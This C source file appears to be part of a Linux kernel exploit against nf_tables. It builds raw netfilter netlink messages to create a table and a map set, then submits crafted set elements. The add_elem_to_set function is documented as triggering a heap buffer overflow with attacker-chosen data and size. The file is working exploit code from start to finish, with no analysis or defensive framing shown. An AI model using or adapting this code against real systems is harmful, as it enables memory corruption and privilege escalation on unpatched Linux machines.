#include <linux/netfilter.h>
#include <linux/netfilter/nf_tables.h>
#include <linux/netfilter/nfnetlink.h>
#include <linux/netlink.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#include "log.h"
#include "netlink.h"
#include "nf_tables.h"

#ifndef NFTA_SET_ELEM_KEY_END
#define NFTA_SET_ELEM_KEY_END (10)
#endif

const uint8_t zerobuf[0x40] = {0};

/**
 * create_table(): Register a new table for the inet family
 * @sock: socket bound to the netfilter netlink
 * @name: Name of the new table
 */
void create_table(int sock, const char *name) {
    struct msghdr msg;
    struct sockaddr_nl dest_snl;
    struct iovec iov[3];
    struct nlmsghdr *nlh_batch_begin;
    struct nlmsghdr *nlh;
    struct nlmsghdr *nlh_batch_end;
    struct nlattr *attr;
    struct nfgenmsg *nfm;

    /* Destination preparation */
    memset(&dest_snl, 0, sizeof(dest_snl));
    dest_snl.nl_family = AF_NETLINK;
    memset(&msg, 0, sizeof(msg));

    /* Netlink batch_begin message preparation */
    nlh_batch_begin = get_batch_begin_nlmsg();

    /* Netlink table message preparation */
    nlh = (struct nlmsghdr *)malloc(TABLEMSG_SIZE);
    if (!nlh) {
        die("malloc: %m");
    }

    memset(nlh, 0, TABLEMSG_SIZE);
    nlh->nlmsg_len = TABLEMSG_SIZE;
    nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWTABLE;
    nlh->nlmsg_pid = getpid();
    nlh->nlmsg_flags = NLM_F_REQUEST;
    nlh->nlmsg_seq = 0;

    nfm = NLMSG_DATA(nlh);
    nfm->nfgen_family = NFPROTO_INET;

    /** Prepare associated attribute **/
    attr = (void *)nlh + NLMSG_SPACE(sizeof(struct nfgenmsg));
    set_str8_attr(attr, NFTA_TABLE_NAME, name);

    /* Netlink batch_end message preparation */
    nlh_batch_end = get_batch_end_nlmsg();

    /* IOV preparation */
    memset(iov, 0, sizeof(struct iovec) * 3);
    iov[0].iov_base = (void *)nlh_batch_begin;
    iov[0].iov_len = nlh_batch_begin->nlmsg_len;
    iov[1].iov_base = (void *)nlh;
    iov[1].iov_len = nlh->nlmsg_len;
    iov[2].iov_base = (void *)nlh_batch_end;
    iov[2].iov_len = nlh_batch_end->nlmsg_len;

    /* Message header preparation */
    msg.msg_name = (void *)&dest_snl;
    msg.msg_namelen = sizeof(struct sockaddr_nl);
    msg.msg_iov = iov;
    msg.msg_iovlen = 3;

    sendmsg(sock, &msg, 0);

    /* Free used structures */
    free(nlh_batch_end);
    free(nlh);
    free(nlh_batch_begin);
}

/**
 * create_set(): Create a netfilter set
 * @sock: Socket used to communicate throught the netfilter netlink
 * @set_name: Name of the created set
 * @set_keylen: Length of the keys of this set. Used in the exploit to control the used cache
 * @data_len: Length of stored data. Used to control the size of the overflow
 * @table_name: Name of the table that stores this set
 * @id: ID of the created set
 */
void create_set(int sock, const char *set_name, uint32_t set_keylen, uint32_t data_len, const char *table_name, uint32_t id) {
    struct msghdr msg;
    struct sockaddr_nl dest_snl;
    struct nlmsghdr *nlh_batch_begin;
    struct nlmsghdr *nlh_payload;
    struct nlmsghdr *nlh_batch_end;
    struct nfgenmsg *nfm;
    struct nlattr *attr;
    uint64_t nlh_payload_size;
    struct iovec iov[3];

    /* Prepare the netlink sockaddr for msg */
    memset(&dest_snl, 0, sizeof(struct sockaddr_nl));
    dest_snl.nl_family = AF_NETLINK;

    /* First netlink message: batch_begin */
    nlh_batch_begin = get_batch_begin_nlmsg();

    /* Second netlink message : Set attributes */
    nlh_payload_size = sizeof(struct nfgenmsg); // Mandatory
    nlh_payload_size += S8_NLA_SIZE;            // NFTA_SET_TABLE
    nlh_payload_size += S8_NLA_SIZE;            // NFTA_SET_NAME
    nlh_payload_size += U32_NLA_SIZE;           // NFTA_SET_ID
    nlh_payload_size += U32_NLA_SIZE;           // NFTA_SET_KEY_LEN
    nlh_payload_size += U32_NLA_SIZE;           // NFTA_SET_FLAGS
    nlh_payload_size += U32_NLA_SIZE;           // NFTA_SET_DATA_TYPE
    nlh_payload_size += U32_NLA_SIZE;           // NFTA_SET_DATA_LEN
    nlh_payload_size = NLMSG_SPACE(nlh_payload_size);

    /** Allocation **/
    nlh_payload = (struct nlmsghdr *)malloc(nlh_payload_size);
    if (!nlh_payload) {
        die("malloc: %m");
    }

    memset(nlh_payload, 0, nlh_payload_size);

    /** Fill the required fields **/
    nlh_payload->nlmsg_len = nlh_payload_size;
    nlh_payload->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWSET;
    nlh_payload->nlmsg_pid = getpid();
    nlh_payload->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE;
    nlh_payload->nlmsg_seq = 0;

    /** Setup the nfgenmsg **/
    nfm = (struct nfgenmsg *)NLMSG_DATA(nlh_payload);
    nfm->nfgen_family = NFPROTO_INET;

    /** Setup the attributes */
    attr = (struct nlattr *)((void *)nlh_payload + NLMSG_SPACE(sizeof(struct nfgenmsg)));
    attr = set_str8_attr(attr, NFTA_SET_TABLE, table_name);
    attr = set_str8_attr(attr, NFTA_SET_NAME, set_name);
    attr = set_u32_attr(attr, NFTA_SET_ID, id);
    attr = set_u32_attr(attr, NFTA_SET_KEY_LEN, set_keylen);
    attr = set_u32_attr(attr, NFTA_SET_FLAGS, NFT_SET_MAP);
    attr = set_u32_attr(attr, NFTA_SET_DATA_TYPE, 0);
    set_u32_attr(attr, NFTA_SET_DATA_LEN, data_len);

    /* Last netlink message: batch_end */
    nlh_batch_end = get_batch_end_nlmsg();

    /* Setup the iovec */
    memset(iov, 0, sizeof(struct iovec) * 3);
    iov[0].iov_base = (void *)nlh_batch_begin;
    iov[0].iov_len = nlh_batch_begin->nlmsg_len;
    iov[1].iov_base = (void *)nlh_payload;
    iov[1].iov_len = nlh_payload->nlmsg_len;
    iov[2].iov_base = (void *)nlh_batch_end;
    iov[2].iov_len = nlh_batch_end->nlmsg_len;

    /* Prepare the message to send */
    memset(&msg, 0, sizeof(struct msghdr));
    msg.msg_name = (void *)&dest_snl;
    msg.msg_namelen = sizeof(struct sockaddr_nl);
    msg.msg_iov = iov;
    msg.msg_iovlen = 3;

    /* Send message */
    sendmsg(sock, &msg, 0);

    /* Free allocated memory */
    free(nlh_batch_end);
    free(nlh_payload);
    free(nlh_batch_begin);
}

/**
 * add_elem_to_set(): Trigger the heap buffer overflow
 * @sock: Socket used to communicate throught the netfilter netlink
 * @set_name: Name of the set to add the element
 * @set_keylen: Length of the keys of the previous set
 * @table_name: Table associated to the preiv
 * @id: ID of the previous set
 * @data_len: Length of the data to copy. (= Size of the overflow - 16 )
 * @data: Data used for the overflow
 *
 * Submit two elements to add to the set.
 * The first one is used to setup the data payload
 * The second will trigger the overflow
 */
void add_elem_to_set(int sock, const char *set_name, uint32_t set_keylen, const char *table_name,
                     uint32_t id, uint32_t data_len, uint8_t *data) {
    struct msghdr msg;
    struct sockaddr_nl dest_snl;
    struct nlmsghdr *nlh_batch_begin;
    struct nlmsghdr *nlh_payload;
    struct nlmsghdr *nlh_batch_end;
    struct nfgenmsg *nfm;
    struct nlattr *attr;
    uint64_t nlh_payload_size;
    uint64_t nested_attr_size;
    size_t first_element_size;
    size_t second_element_size;
    struct iovec iov[3];

    /* Prepare the netlink sockaddr for msg */
    memset(&dest_snl, 0, sizeof(struct sockaddr_nl));
    dest_snl.nl_family = AF_NETLINK;

    /* First netlink message: batch */
    nlh_batch_begin = get_batch_begin_nlmsg();

    /* Second netlink message : Set attributes */

    /** Precompute the size of the nested field **/
    nested_attr_size = 0;

    /*** First element ***/
    nested_attr_size += sizeof(struct nlattr);             // Englobing attribute
    nested_attr_size += sizeof(struct nlattr);             // NFTA_SET_ELEM_KEY
    nested_attr_size += NLA_BIN_SIZE(set_keylen);          // NFTA_DATA_VALUE
    nested_attr_size += sizeof(struct nlattr);             // NFTA_SET_ELEM_KEY_END
    nested_attr_size += NLA_BIN_SIZE(set_keylen);          // NFTA_DATA_VALUE
    nested_attr_size += sizeof(struct nlattr);             // NFTA_SET_ELEM_DATA
    nested_attr_size += NLA_ALIGN(NLA_BIN_SIZE(data_len)); // NFTA_DATA_VALUE
    first_element_size = nested_attr_size;

    /*** Second element ***/
    nested_attr_size += sizeof(struct nlattr);    // Englobing attribute
    nested_attr_size += sizeof(struct nlattr);    // NFTA_SET_ELEM_KEY
    nested_attr_size += NLA_BIN_SIZE(set_keylen); // NFTA_DATA_VALUE
    nested_attr_size += sizeof(struct nlattr);    // NFTA_SET_ELEM_KEY_END
    nested_attr_size += NLA_BIN_SIZE(set_keylen); // NFTA_DATA_VALUE
    nested_attr_size += sizeof(struct nlattr);    // NFTA_SET_ELEM_DATA
    nested_attr_size += sizeof(struct nlattr);    // NFTA_DATA_VERDICT
    nested_attr_size += U32_NLA_SIZE;             // NFTA_VERDICT_CODE
    second_element_size = nested_attr_size - first_element_size;

    nlh_payload_size = sizeof(struct nfgenmsg); // Mandatory
    nlh_payload_size += sizeof(struct nlattr);  // NFTA_SET_ELEM_LIST_ELEMENTS
    nlh_payload_size += nested_attr_size;       // All the stuff described above
    nlh_payload_size += S8_NLA_SIZE;            // NFTA_SET_ELEM_LIST_TABLE
    nlh_payload_size += S8_NLA_SIZE;            // NFTA_SET_ELEM_LIST_SET
    nlh_payload_size += U32_NLA_SIZE;           // NFTA_SET_ELEM_LIST_SET_ID
    nlh_payload_size = NLMSG_SPACE(nlh_payload_size);

    /** Allocation **/
    nlh_payload = (struct nlmsghdr *)malloc(nlh_payload_size);
    if (!nlh_payload) {
        die("malloc: %m");
    }
    memset(nlh_payload, 0, nlh_payload_size);

    /** Fill the required fields **/
    nlh_payload->nlmsg_len = nlh_payload_size;
    nlh_payload->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWSETELEM;
    nlh_payload->nlmsg_pid = getpid();
    nlh_payload->nlmsg_flags = NLM_F_REQUEST;
    nlh_payload->nlmsg_seq = 0;

    /** Setup the nfgenmsg **/
    nfm = (struct nfgenmsg *)NLMSG_DATA(nlh_payload);
    nfm->nfgen_family = NFPROTO_INET;

    /** Setup the attributes */
    attr = (struct nlattr *)((void *)nlh_payload + NLMSG_SPACE(sizeof(struct nfgenmsg)));
    attr = set_str8_attr(attr, NFTA_SET_ELEM_LIST_TABLE, table_name);
    attr = set_str8_attr(attr, NFTA_SET_ELEM_LIST_SET, set_name);
    attr = set_u32_attr(attr, NFTA_SET_ELEM_LIST_SET_ID, id);
    attr = set_nested_attr(attr, NFTA_SET_ELEM_LIST_ELEMENTS, nested_attr_size);

    /*** First element ***/
    attr = set_nested_attr(attr, 0, first_element_size - 4);
    attr = set_nested_attr(attr, NFTA_SET_ELEM_KEY, NLA_BIN_SIZE(set_keylen));
    attr = set_binary_attr(attr, NFTA_DATA_VALUE, (uint8_t *)zerobuf, set_keylen);
    attr = set_nested_attr(attr, NFTA_SET_ELEM_KEY_END, NLA_BIN_SIZE(set_keylen));
    attr = set_binary_attr(attr, NFTA_DATA_VALUE, (uint8_t *)zerobuf, set_keylen);
    attr = set_nested_attr(attr, NFTA_SET_ELEM_DATA, NLA_BIN_SIZE(data_len));
    attr = set_binary_attr(attr, NFTA_DATA_VALUE, (uint8_t *)data, data_len);

    /*** Second element ***/
    attr = set_nested_attr(attr, 0, second_element_size - 4);
    attr = set_nested_attr(attr, NFTA_SET_ELEM_KEY, NLA_BIN_SIZE(set_keylen));
    attr = set_binary_attr(attr, NFTA_DATA_VALUE, (uint8_t *)zerobuf, set_keylen);
    attr = set_nested_attr(attr, NFTA_SET_ELEM_KEY_END, NLA_BIN_SIZE(set_keylen));
    attr = set_binary_attr(attr, NFTA_DATA_VALUE, (uint8_t *)zerobuf, set_keylen);
    attr = set_nested_attr(attr, NFTA_SET_ELEM_DATA, U32_NLA_SIZE + sizeof(struct nlattr));
    attr = set_nested_attr(attr, NFTA_DATA_VERDICT, U32_NLA_SIZE);
    attr = set_u32_attr(attr, NFTA_VERDICT_CODE, NFT_CONTINUE);

    /* Last netlink message: End of batch */
    nlh_batch_end = get_batch_end_nlmsg();

    /* Setup the iovec */
    memset(iov, 0, sizeof(struct iovec) * 3);
    iov[0].iov_base = (void *)nlh_batch_begin;
    iov[0].iov_len = nlh_batch_begin->nlmsg_len;
    iov[1].iov_base = (void *)nlh_payload;
    iov[1].iov_len = nlh_payload->nlmsg_len;
    iov[2].iov_base = (void *)nlh_batch_end;
    iov[2].iov_len = nlh_batch_end->nlmsg_len;

    /* Prepare the message to send */
    memset(&msg, 0, sizeof(struct msghdr));
    msg.msg_name = (void *)&dest_snl;
    msg.msg_namelen = sizeof(struct sockaddr_nl);
    msg.msg_iov = iov;
    msg.msg_iovlen = 3;

    /* Send message */
    sendmsg(sock, &msg, 0);

    /* Free allocated memory */
    free(nlh_batch_end);
    free(nlh_payload);
    free(nlh_batch_begin);
}
